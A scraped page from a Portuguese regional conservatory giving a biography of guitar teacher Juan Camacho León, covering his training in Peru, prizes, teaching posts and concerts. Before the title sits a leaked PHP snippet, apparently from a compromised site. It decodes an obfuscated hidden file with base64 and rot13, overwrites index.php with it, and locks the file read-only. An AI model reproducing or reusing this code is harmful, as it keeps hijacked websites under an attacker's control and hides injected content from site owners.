$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Juan Camacho León – Guitarra – Conservatório Regional do Baixo Alentejo

Juan Camacho León – Guitarra

Nasceu na cidade de Chiclayo –Perú iniciando os seus estudos musicais de piano aos 8 anos de idade na Escola de música do conservatório da sua cidade natal.  

A partir dos 11 anos de idade começou a estudar viola dedilhada, terminando o Curso Superior na Escola Superior de Música de Lambayeque.

Estudou com o maestro António Miñano Bardales e fez um curso de aperfeiçoamento com o guitarrista japonês Ryuhei Kobayashi, no Equador.

Durante 1987 e 1993, foi professor no Conservatório Superior de Música de Chiclayo tendo leccionado as disciplinas de Guitarra Cláasica, Harmonía e Arranjo Coral.

Compositor, arranjador e improvisador . Realizó paralelamente  estúdios de Violoncello, Contrabajo y Clarinete, siendo el piano o seu segundo instrumento.

Em 1989 ganhou o 1º premio do Concurso Nacional de Guitarra Clássica, organizado pelas Juventudes Musicais do Perú, em Lima.

Realizou numerosos concertos, como solista em todo su país (Perú) e nas cidades de Quito e Guayaquil no Equador como vencedor do Concurso Nacional de Guitarra Clássica.

No ano de 1993 começou a leccionar como professor convidado no Conservatório de Horta nos Açores, realizando concertos quer como solista, quer de música de câmara na maior parte das ilhas açoreanas.

Juan Carlos León tem participado em Master Classes com David Russell, David Starobin, Roland Dyens, Costas Cotsiolis, Roberto Aussell, Eduardo Isaac, Hugo Geller, Jesús Castro Balbi, Hopkinson Smith, Joaquin Clerch, Ricardo Gallén, Carles Trepat, Ignacio Rodes, Illiane Matos.

Actualmente é professor de Viola dedilhada no Conservatório Regional do Baixo Alentejo (Beja). Foi professor na Academia de Lagos durante o período de 2009 a 2017  tendo efectuado concertos nesta cidade e seus concelhos assim como em Lisboa, Braga, Albufeira, Portimão e em Faro.

 Terminou o 5º ano de estudos de Piano Clássico no ano 2004 no Conservatório de Beja e a Licenciatura em Musica na Universidade de Évora no ano 2006.

No ano 2008 gravou um disco com música para flauta y guitarra con o prestigiado flautista peruano César Peredo na cidade de Lima-Perú com obras originais para   flauta e guitarra dos compositores Mauro Giuliani e Astor Piazzolla.

Em Agosto de 2013 realizou dois importantes concertos de Jazz em Taiwan-China.

E durante os anos 2014 2015 tem continuado a realizar recitais a solo e concertos na área da música clássica e o Jazz.

Durante o período  2017/2019 trabalhou como professor contratado no Agrupamento de Escolas da Bemposta-Portimão.

Actualmente é  professor na Academia de Música de Portimão e no Conservatório Regional do Baixo Alentejo.

Projetos:

  1. Juan Camacho León…..Guitarra Clássica
  2. Juan Camacho León…..Jazz Guitar
  3. Juan Camacho León……Trio de Jazz.

Youtube Canal de: Juan Camacho León.

Leave a Reply

Your email address will not be published.